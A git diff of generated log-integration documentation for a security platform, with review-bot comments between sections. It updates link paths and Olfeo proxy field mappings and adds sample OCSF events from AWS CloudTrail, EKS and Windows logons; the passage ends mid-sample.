@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "admin_login.json" diff --git a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md index 2c9f3e0527..b81e9a24d1 100644 --- a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md +++ b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "network_log.json" @@ -47,7 +47,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "method": "CONNECT" }, "response": { - "bytes": 1000, "status_code": 200 }, "version": "1.1" @@ -59,7 +58,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "olfeo": { "request": { - "type": "Business Services" + "type": "Business Services", + "type_id": 1000 } }, "related": { 
@@ -90,6 +90,70 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "network_log_date.json" + + ```json + + { + "message": "1.2.3.4 - jdoe [02/07/2024 07:51:20] \"GET http://example.com/ HTTP/1.1\" 403 - - 0 Unclassified URL", + "event": { + "category": [ + "web" + ], + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-02T07:51:20Z", + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 403 + }, + "version": "1.1" + }, + "observer": { + "product": "Olfeo Secure Web Gateway", + "type": "proxy", + "vendor": "Olfeo" + }, + "olfeo": { + "request": { + "type": "Unclassified URL", + "type_id": 0 + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "url": { + "domain": "example.com", + "original": "http://example.com/", + "path": "/", + "port": 80, + "registered_domain": "example.com", + "scheme": "http", + "top_level_domain": "com" + } + } + + ``` + + === "network_log_no_user.json" ```json @@ -110,7 +174,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "method": "POST" }, "response": { - "bytes": 12, "status_code": 400 }, "version": "1.1" @@ -122,7 +185,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "olfeo": { "request": { - "type": "Advertising" + "type": "Advertising", + "type_id": 12 } }, "related": { @@ -167,7 +231,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "method": "PUT" }, "response": { - "bytes": 512, "status_code": 300 }, "version": "1.1" @@ -179,7 +242,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "olfeo": { "request": { - "type": "Shopping" + "type": "Shopping", + "type_id": 512 } }, "related": { 
@@ -217,13 +281,13 @@ The following table lists the fields that are extracted, normalized under the EC |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | |`http.request.method` | `keyword` | HTTP request method. | -|`http.response.bytes` | `long` | Total size in bytes of the response (body and headers). | |`http.response.status_code` | `long` | HTTP response status code. | |`http.version` | `keyword` | HTTP version. | |`observer.product` | `keyword` | The product name of the observer. | |`observer.type` | `keyword` | The type of the observer the data is coming from. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`olfeo.request.type` | `keyword` | Olfeo request url category | +|`olfeo.request.type_id` | `long` | Olfeo request url category id | |`source.ip` | `ip` | IP address of the source. | |`source.user.name` | `keyword` | Short name or login of the user. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | diff --git a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md index 614326d160..a7fbe0dfbd 100644 --- a/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md +++ b/_shared_content/operations_center/integrations/generated/a2915a14-d1e9-4397-86fc-8f8b2c617466_sample.md @@ -12,6 +12,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "network_log_date" + + ``` + 1.2.3.4 - jdoe [02/07/2024 07:51:20] "GET http://example.com/ HTTP/1.1" 403 - - 0 Unclassified URL + ``` + + + === "network_log_no_user" ``` 
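Review bot: the added table row `|`olfeo.request.type_id` | `long` | Olfeo request url category id |` (like the existing `olfeo.request.type` row it sits next to) is the only description in the table without a terminating period; the surrounding rows all end with one. Suggest `Olfeo request URL category id.` for consistency, and since the dropped `http.response.bytes` row was a mis-mapped field rather than a real response size, a short note in the table or section that the category id is what the raw log carries in that position would save readers from looking for the bytes field elsewhere.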
diff --git a/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md b/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md index ab653a425d..1c01863696 100644 --- a/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md +++ b/_shared_content/operations_center/integrations/generated/a406a8c1-e1e0-4fe9-835b-3607d01150e6.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_exchange_added_mailbox.json" diff --git a/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md index 4022c45d5b..d6adb8fe88 100644 
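Review bot: the `/docs/xdr/...` to `/xdr/...` link change is repeated verbatim across every generated integration page in this patch (`/docs/xdr/features/detect/rules_catalog` → `/xdr/features/detect/rules_catalog` and the two sibling links), and the files live under `generated/`. Please confirm the template the generator renders this paragraph from was updated in the same change, otherwise the next regeneration will silently revert these links to the old `/docs/` paths.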
--- a/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md +++ b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_account_change_1.json" @@ -1577,7 +1576,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -1807,3 +1806,6 @@ The following table lists the fields that are extracted, normalized under the EC |`vulnerability.score.version` | `keyword` | CVSS version. | |`vulnerability.severity` | `keyword` | Severity of the vulnerability. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/OCSF/ocsf). \ No newline at end of file 
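Review bot: the new trailing line `+For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](...)` is committed without a terminating newline (`\ No newline at end of file`); add the newline so the next diff against this file stays clean. While the heading levels are being changed here, the unchanged context line `It should be noted that infered fields are not listed.` carries the typo `infered` (should be `inferred`), which is presumably in the same generator template and could be fixed in the same pass.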
diff --git a/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5_sample.md b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5_sample.md new file mode 100644 index 0000000000..d7bae59044 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/a9c959ac-78ec-47a4-924e-8156a77cebf5_sample.md 
@@ -0,0 +1,3238 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_account_change_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Create", + "actor": { + "idp": { + "name": null + }, + "invoked_by": null, + "session": { + "created_time": 1700239437000, + "created_time_dt": "2023-11-17T16:43:57Z", + "is_mfa": false, + "issuer": "arn:aws:iam::112233445566:role/Admin" + }, + "user": { + "account": { + "uid": "112233445566" + }, + "credential_uid": null, + "type": "AssumedRole", + "uid": "arn:aws:sts::112233445566:assumed-role/Admin/Admin-user", + "uid_alt": "AROA2W7SOKHEXAMPLE:Admin-user" + } + }, + "api": { + "operation": "CreateUser", + "request": { + "data": { + "userName": "test_user2" + }, + "uid": "c99bf9da-e0bd-4bf7-bb32-example" + }, + "response": { + "data": { + "user": { + "arn": "arn:aws:iam::112233445566:user/test_user2", + "createDate": "Mar 17, 2023 5:07:59 PM", + "path": "/", + "userId": "AIDA2W7SOKHEXAMPLE", + "userName": "test_user2" + } + }, + "error": null, + "message": null + }, + "service": { + "name": "iam.amazonaws.com" + }, + "version": null + }, + "category_name": "Identity & Access Management Category", + "category_uid": 3, + "class_name": "Account Change", + "class_uid": 3001, + "cloud": { + "provider": "AWS", + "region": "us-east-1" + }, + "http_request": { + "user_agent": "AWS Internal" + }, + "metadata": { + "log_name": "AwsApiCall", + "log_provider": "CloudTrail", + "product": { + "feature": { + "name": "Management" + }, + "name": "CloudTrail", + "vendor_name": "AWS", + "version": "1.08" + }, + "profiles": [ + "cloud", + "datetime" + ], + "uid": "7dd15a89-ae0f-4340-8e6c-example", + "version": "1.1.0" + }, + "observables": [ + 
{ + "name": "user.name", + "type": "User", + "type_id": 4, + "value": "test_user2" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "52.95.4.21" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "52.95.4.21", + "uid": null + }, + "time": 1679072879000, + "time_dt": "2023-03-17T17:07:59Z", + "type_name": "Account Change: Create", + "type_uid": 300101, + "unmapped": { + "eventType": "AwsApiCall", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "112233445566", + "requestParameters": { + "userName": "test_user2" + }, + "responseElements": { + "user": { + "arn": "arn:aws:iam::112233445566:user/test_user2", + "createDate": "Mar 17, 2023 5:07:59 PM", + "path": "/", + "userId": "AIDA2W7SOKHEXAMPLE", + "userName": "test_user2" + } + }, + "sessionCredentialFromConsole": "true", + "userIdentity": { + "sessionContext": { + "attributes": { + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "112233445566", + "principalId": "AROA2W7SOKHEXAMPLE", + "type": "Role" + }, + "webIdFederationData": {} + } + } + }, + "user": { + "name": "test_user2", + "uid": "AROA2W7SOKHEXAMPLE:Admin-user" + } + } + ``` + + + +=== "test_api_activity_1" + + + ```json + { + "activity_id": 2, + "activity_name": "Read", + "actor": { + "idp": { + "name": null + }, + "invoked_by": null, + "session": { + "created_time": 0, + "created_time_dt": null, + "issuer": null + }, + "user": { + "account": { + "uid": "1111111111111" + }, + "credential_uid": "AKIA3Z2XBVEXAMPLE", + "name": "Level6", + "type": "IAMUser", + "uid": "arn:aws:iam::1111111111111:user/Level6", + "uid_alt": "AIDADO2GQEXAMPLE" + } + }, + "api": { + "operation": "DescribeDirectConnectGateways", + "request": { + "data": null, + "uid": "1c8a6220-4263-4763-b526-example" + }, + "response": { + "data": { + "directConnectGateways": [] + }, + "error": null, + "message": null + }, + "service": { + "name": "directconnect.amazonaws.com" + 
}, + "version": null + }, + "category_name": "Application Activity", + "category_uid": 6, + "class_name": "API Activity", + "class_uid": 6003, + "cloud": { + "provider": "AWS", + "region": "us-east-1" + }, + "http_request": { + "user_agent": "Boto3/1.15.2 Python/3.8.2 Linux/5.6.3-arch1-1 Botocore/1.18.2" + }, + "metadata": { + "log_name": "AwsApiCall", + "log_provider": "CloudTrail", + "product": { + "feature": { + "name": null + }, + "name": "CloudTrail", + "vendor_name": "AWS", + "version": "1.05" + }, + "profiles": [ + "cloud", + "datetime" + ], + "uid": "71c88be9-ea5c-43c7-8c82-example", + "version": "1.1.0" + }, + "observables": [ + { + "name": "actor.user.name", + "type": "User", + "type_id": 4, + "value": "Level6" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "205.8.181.128" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "205.8.181.128" + }, + "status": null, + "status_id": 99, + "time": 1695334972000, + "time_dt": "2023-09-21T22:22:52Z", + "type_name": "API Activity: Read", + "type_uid": 600302, + "unmapped": { + "eventType": "AwsApiCall", + "recipientAccountId": "1111111111111", + "requestParameters": null, + "responseElements": { + "directConnectGateways": [] + }, + "userIdentity": {} + } + } + ``` + + + +=== "test_api_activity_2" + + + ```json + { + "activity_id": 1, + "activity_name": "Create", + "actor": { + "session": { + "credential_uid": "EXAMPLEUIDTEST", + "issuer": "arn:aws:iam::123456789012:role/example-test-161366663-NodeInstanceRole-abc12345678912", + "uid": "i-12345678901" + }, + "user": { + "groups": [ + { + "name": "system:bootstrappers" + }, + { + "name": "system:nodes" + }, + { + "name": "system:authenticated" + } + ], + "name": "system:node:ip-192-001-02-03.ec2.internal", + "type_id": 0, + "uid": "heptio-authenticator-aws:123456789012:ABCD1234567890EXAMPLE" + } + }, + "api": { + "operation": "create", + "request": { + "uid": 
"f47c68f2-d3ac-4f96-b2f4-5d497bf79b64" + }, + "response": { + "code": 201 + }, + "version": "v1" + }, + "category_name": "Application Activity", + "category_uid": 6, + "class_name": "API Activity", + "class_uid": 6003, + "cloud": { + "account": { + "uid": "arn:aws:sts::123456789012:assumed-role/example-test-161366663-NodeInstanceRole-abc12345678912/i-12345678901" + }, + "provider": "AWS" + }, + "http_request": { + "url": { + "path": "/api/v1/nodes" + }, + "user_agent": "kubelet/v1.21.2 (linux/amd64) kubernetes/729bdfc" + }, + "message": "ResponseComplete", + "metadata": { + "log_level": "RequestResponse", + "product": { + "feature": { + "name": "Elastic Kubernetes Service" + }, + "name": "Amazon EKS", + "vendor_name": "AWS", + "version": "audit.k8s.io/v1" + }, + "profiles": [ + "cloud", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "actor.user.name", + "type": "User Name", + "type_id": 4, + "value": "system:node:ip-192-001-02-03.ec2.internal" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "12.000.22.33" + }, + { + "name": "http_request.url.path", + "type": "URL String", + "type_id": 6, + "value": "/api/v1/nodes" + } + ], + "resources": [ + { + "name": "ip-192-001-02-03.ec2.internal", + "type": "nodes" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "12.000.22.33" + }, + "start_time_dt": "2021-09-07 20:37:30.502000", + "time": 1631047050642, + "time_dt": "2021-09-07 20:37:30.642000", + "type_name": "API Activity: Create", + "type_uid": 600301, + "unmapped": { + "responseObject.status.capacity.cpu": "4", + "annotations.authorization.k8s.io/reason": "", + "requestObject.metadata.annotations.volumes.kubernetes.io/controller-managed-attach-detach": "true", + "responseObject.metadata.labels.kubernetes.io/hostname": "ip-192-001-02-03.ec2.internal", + "requestObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateVersion": "1", + 
"responseObject.metadata.labels.alpha.eksctl.io/cluster-name": "ABCD1234567890EXAMPLE", + "responseObject.metadata.labels.eks.amazonaws.com/nodegroup-image": "ami-0193ebf9573ebc9f7", + "responseObject.metadata.managedFields[].time": "2021-09-07T20:37:30Z", + "responseObject.status.nodeInfo.kubeletVersion": "v1.21.2-eks-55daa9d", + "responseObject.status.nodeInfo.kubeProxyVersion": "v1.21.2-eks-55daa9d", + "requestObject.status.capacity.hugepages-1Gi": "0", + "responseObject.metadata.managedFields[].manager": "kubelet", + "annotations.authorization.k8s.io/decision": "allow", + "requestObject.status.nodeInfo.systemUUID": "ec2483c6-33b0-e271-f36c-e14e45a361b8", + "responseObject.metadata.name": "ip-192-001-02-03.ec2.internal", + "responseObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateVersion": "1", + "responseObject.apiVersion": "v1", + "requestObject.metadata.labels.kubernetes.io/arch": "amd64", + "requestObject.status.allocatable.hugepages-2Mi": "0", + "requestObject.metadata.labels.alpha.eksctl.io/cluster-name": "ABCD1234567890EXAMPLE", + "responseObject.status.allocatable.memory": "15076868Ki", + "responseObject.status.conditions[].lastHeartbeatTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "responseObject.spec.providerID": "aws:///us-east-1f/i-12345678901", + "requestObject.status.nodeInfo.architecture": "amd64", + "responseObject.status.nodeInfo.kernelVersion": "5.4.141-67.229.amzn2.x86_64", + "responseObject.status.allocatable.pods": "58", + "requestObject.status.conditions[].status": "False,False,False,False", + "requestObject.metadata.labels.failure-domain.beta.kubernetes.io/region": "us-east-1", + "responseObject.metadata.labels.beta.kubernetes.io/os": "linux", + "responseObject.metadata.labels.kubernetes.io/os": "linux", + "requestObject.status.addresses[].address": "192.000.22.33,12.000.22.33,ip-192-001-02-03.ec2.internal,ip-192-001-02-03.ec2.internal,ec2-12.000.22.33.compute-1.amazonaws.com", 
+ "responseObject.status.capacity.hugepages-1Gi": "0", + "responseObject.status.conditions[].reason": "KubeletHasSufficientMemory,KubeletHasNoDiskPressure,KubeletHasSufficientPID,KubeletNotReady", + "requestObject.apiVersion": "v1", + "requestObject.status.capacity.cpu": "4", + "requestObject.metadata.labels.node.kubernetes.io/instance-type": "m5.xlarge", + "requestObject.metadata.labels.eks.amazonaws.com/nodegroup-image": "ami-0193ebf9573ebc9f7", + "responseObject.metadata.labels.node.kubernetes.io/instance-type": "m5.xlarge", + "responseObject.status.allocatable.hugepages-2Mi": "0", + "responseObject.status.allocatable.attachable-volumes-aws-ebs": "25", + "requestObject.status.nodeInfo.containerRuntimeVersion": "docker://19.3.13", + "requestObject.status.allocatable.attachable-volumes-aws-ebs": "25", + "responseObject.status.conditions[].lastTransitionTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "responseObject.metadata.creationTimestamp": "2021-09-07T20:37:30Z", + "requestObject.metadata.labels.kubernetes.io/hostname": "ip-192-001-02-03.ec2.internal", + "requestObject.status.nodeInfo.bootID": "0d0dd4f2-8829-4b03-9f29-794f4908281b", + "requestObject.status.nodeInfo.kubeProxyVersion": "v1.21.2-eks-55daa9d", + "responseObject.kind": "Node", + "requestObject.status.nodeInfo.osImage": "Amazon Linux 2", + "requestObject.status.conditions[].type": "MemoryPressure,DiskPressure,PIDPressure,Ready", + "requestObject.status.daemonEndpoints.kubeletEndpoint.Port": "10250", + "responseObject.metadata.labels.kubernetes.io/arch": "amd64", + "responseObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateId": "lt-0f20d6f901007611e", + "requestObject.status.capacity.attachable-volumes-aws-ebs": "25", + "responseObject.status.conditions[].message": "kubelet has sufficient memory available,kubelet has no disk pressure,kubelet has sufficient PID available,[container runtime status check may not have completed yet, container 
runtime network not ready: NetworkReady=false reason:NetworkPluginNotReady message:docker: network plugin is not ready: cni config uninitialized, CSINode is not yet initialized, missing node capacity for resources: ephemeral-storage]", + "responseObject.status.nodeInfo.operatingSystem": "linux", + "requestObject.metadata.labels.alpha.eksctl.io/nodegroup-name": "ng-5fe434eb", + "responseObject.status.capacity.memory": "16093700Ki", + "requestObject.metadata.labels.beta.kubernetes.io/arch": "amd64", + "requestObject.metadata.labels.eks.amazonaws.com/capacityType": "ON_DEMAND", + "requestObject.status.allocatable.memory": "15076868Ki", + "requestObject.status.conditions[].lastHeartbeatTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "responseObject.status.capacity.attachable-volumes-aws-ebs": "25", + "responseObject.status.nodeInfo.osImage": "Amazon Linux 2", + "responseObject.metadata.labels.beta.kubernetes.io/instance-type": "m5.xlarge", + "responseObject.metadata.labels.alpha.eksctl.io/nodegroup-name": "ng-5fe434eb", + "requestObject.metadata.labels.beta.kubernetes.io/instance-type": "m5.xlarge", + "responseObject.status.nodeInfo.architecture": "amd64", + "responseObject.metadata.labels.topology.kubernetes.io/zone": "us-east-1f", + "requestObject.status.capacity.hugepages-2Mi": "0", + "requestObject.status.conditions[].message": "kubelet has sufficient memory available,kubelet has no disk pressure,kubelet has sufficient PID available,[container runtime status check may not have completed yet, container runtime network not ready: NetworkReady=false reason:NetworkPluginNotReady message:docker: network plugin is not ready: cni config uninitialized, CSINode is not yet initialized, missing node capacity for resources: ephemeral-storage]", + "responseObject.metadata.labels.failure-domain.beta.kubernetes.io/region": "us-east-1", + "requestObject.metadata.labels.eks.amazonaws.com/sourceLaunchTemplateId": 
"lt-0f20d6f901007611e", + "responseObject.spec.taints[].effect": "NoSchedule", + "requestObject.metadata.labels.topology.kubernetes.io/region": "us-east-1", + "requestObject.metadata.name": "ip-192-001-02-03.ec2.internal", + "responseObject.status.nodeInfo.machineID": "ec2483c633b0e271f36ce14e45a361b8", + "kind": "Event", + "responseObject.metadata.annotations.volumes.kubernetes.io/controller-managed-attach-detach": "true", + "responseObject.status.nodeInfo.bootID": "0d0dd4f2-8829-4b03-9f29-794f4908281b", + "responseObject.status.conditions[].status": "False,False,False,False", + "requestObject.metadata.labels.beta.kubernetes.io/os": "linux", + "requestObject.status.allocatable.hugepages-1Gi": "0", + "requestObject.status.addresses[].type": "InternalIP,ExternalIP,Hostname,InternalDNS,ExternalDNS", + "requestObject.metadata.labels.failure-domain.beta.kubernetes.io/zone": "us-east-1f", + "requestObject.status.allocatable.cpu": "3920m", + "requestObject.metadata.labels.kubernetes.io/os": "linux", + "requestObject.status.nodeInfo.operatingSystem": "linux", + "responseObject.status.daemonEndpoints.kubeletEndpoint.Port": "10250", + "responseObject.status.nodeInfo.systemUUID": "ec2483c6-33b0-e271-f36c-e14e45a361b8", + "responseObject.metadata.labels.failure-domain.beta.kubernetes.io/zone": "us-east-1f", + "requestObject.metadata.labels.topology.kubernetes.io/zone": "us-east-1f", + "responseObject.status.nodeInfo.containerRuntimeVersion": "docker://19.3.13", + "requestObject.status.nodeInfo.kernelVersion": "5.4.141-67.229.amzn2.x86_64", + "requestObject.kind": "Node", + "requestObject.spec.providerID": "aws:///us-east-1f/i-12345678901", + "responseObject.metadata.uid": "4ecf628a-1b50-47ed-932c-bb1df89dad10", + "responseObject.status.capacity.hugepages-2Mi": "0", + "responseObject.metadata.managedFields[].fieldsType": "FieldsV1", + "responseObject.metadata.labels.topology.kubernetes.io/region": "us-east-1", + "responseObject.status.capacity.pods": "58", + 
"requestObject.status.capacity.memory": "16093700Ki", + "responseObject.metadata.managedFields[].apiVersion": "v1", + "responseObject.status.allocatable.hugepages-1Gi": "0", + "responseObject.metadata.resourceVersion": "67933403", + "responseObject.status.addresses[].address": "192.000.22.33,12.000.22.33,ip-192-001-02-03.ec2.internal,ip-192-001-02-03.ec2.internal,ec2-12.000.22.33.compute-1.amazonaws.com", + "requestObject.status.conditions[].lastTransitionTime": "2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z,2021-09-07T20:37:28Z", + "requestObject.status.nodeInfo.kubeletVersion": "v1.21.2-eks-55daa9d", + "responseObject.metadata.labels.eks.amazonaws.com/nodegroup": "ng-5fe434eb", + "requestObject.metadata.labels.eks.amazonaws.com/nodegroup": "ng-5fe434eb", + "requestObject.status.conditions[].reason": "KubeletHasSufficientMemory,KubeletHasNoDiskPressure,KubeletHasSufficientPID,KubeletNotReady", + "responseObject.metadata.labels.eks.amazonaws.com/capacityType": "ON_DEMAND", + "requestObject.status.nodeInfo.machineID": "ec2483c633b0e271f36ce14e45a361b8", + "responseObject.status.addresses[].type": "InternalIP,ExternalIP,Hostname,InternalDNS,ExternalDNS", + "responseObject.metadata.labels.beta.kubernetes.io/arch": "amd64", + "responseObject.metadata.managedFields[].operation": "Update", + "responseObject.status.allocatable.cpu": "3920m", + "responseObject.status.conditions[].type": "MemoryPressure,DiskPressure,PIDPressure,Ready", + "responseObject.spec.taints[].key": "node.kubernetes.io/not-ready", + "sourceIPs[]": "12.000.22.33", + "requestObject.status.capacity.pods": "58", + "requestObject.status.allocatable.pods": "58" + } + } + ``` + + + +=== "test_authentication_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Logon", + "actor": { + "idp": { + "name": null + }, + "invoked_by": null, + "session": { + "issuer": null + }, + "user": { + "account": { + "uid": "111122223333" + }, + "credential_uid": null, + "name": "anaya", + "type": 
"IAMUser", + "uid": "arn:aws:iam::111122223333:user/anaya", + "uid_alt": "AIDACKCEVSQ6C2EXAMPLE" + } + }, + "api": { + "operation": "ConsoleLogin", + "request": { + "data": null, + "uid": "" + }, + "response": { + "data": { + "ConsoleLogin": "Success" + }, + "error": null, + "message": null + }, + "service": { + "name": "signin.amazonaws.com" + }, + "version": null + }, + "category_name": "Identity & Access Management Category", + "category_uid": 3, + "class_name": "Authentication", + "class_uid": 3002, + "cloud": { + "provider": "AWS", + "region": "us-east-1" + }, + "dst_endpoint": { + "svc_name": "https://console.aws.amazon.com/console/home?state=hashArgs%23&isauthcode=true" + }, + "http_request": { + "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" + }, + "is_mfa": true, + "metadata": { + "event_code": "AwsConsoleSignIn", + "log_provider": "CloudTrail", + "product": { + "feature": { + "name": "Management" + }, + "name": "CloudTrail", + "vendor_name": "AWS", + "version": "1.08" + }, + "profiles": [ + "cloud", + "datetime" + ], + "uid": "fed06f42-cb12-4764-8c69-example", + "version": "1.1.0" + }, + "observables": [ + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "192.0.2.0" + } + ], + "session": { + "expiration_time": null + }, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "192.0.2.0" + }, + "status": "Success", + "status_id": 1, + "time": 1699633474000, + "time_dt": "2023-11-10T16:24:34Z", + "type_name": "Authentication: Logon", + "type_uid": 300201, + "unmapped": { + "additionalEventData": { + "LoginTo": "https://console.aws.amazon.com/console/home?state=hashArgs%23&isauthcode=true", + "MFAIdentifier": "arn:aws:iam::111122223333:u2f/user/anaya/default-AAAAAAAABBBBBBBBCCCCCCCCDD", + "MobileVersion": "No" + }, + "eventType": "AwsConsoleSignIn", + "recipientAccountId": "111122223333", + "requestParameters": 
null, + "responseElements": {}, + "userIdentity": {} + }, + "user": { + "uid": "arn:aws:iam::111122223333:user/anaya", + "uid_alt": "AIDACKCEVSQ6C2EXAMPLE" + } + } + ``` + + + +=== "test_authentication_2" + + + ```json + { + "activity_id": 1, + "activity_name": "Logon", + "actor": { + "process": { + "file": { + "name": "services.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\services.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 848 + }, + "session": { + "uid": "0x3E7" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "ATTACKRANGE", + "name": "WIN-DC-725$", + "uid": "NT AUTHORITY\\SYSTEM" + } + }, + "auth_protocol": "Other", + "auth_protocol_id": 99, + "category_name": "Audit Activity", + "category_uid": 3, + "class_name": "Authentication", + "class_uid": 3002, + "device": { + "hostname": "win-dc-725.attackrange.local", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "dst_endpoint": { + "hostname": "win-dc-725.attackrange.local" + }, + "logon_process": { + "name": "Advapi ", + 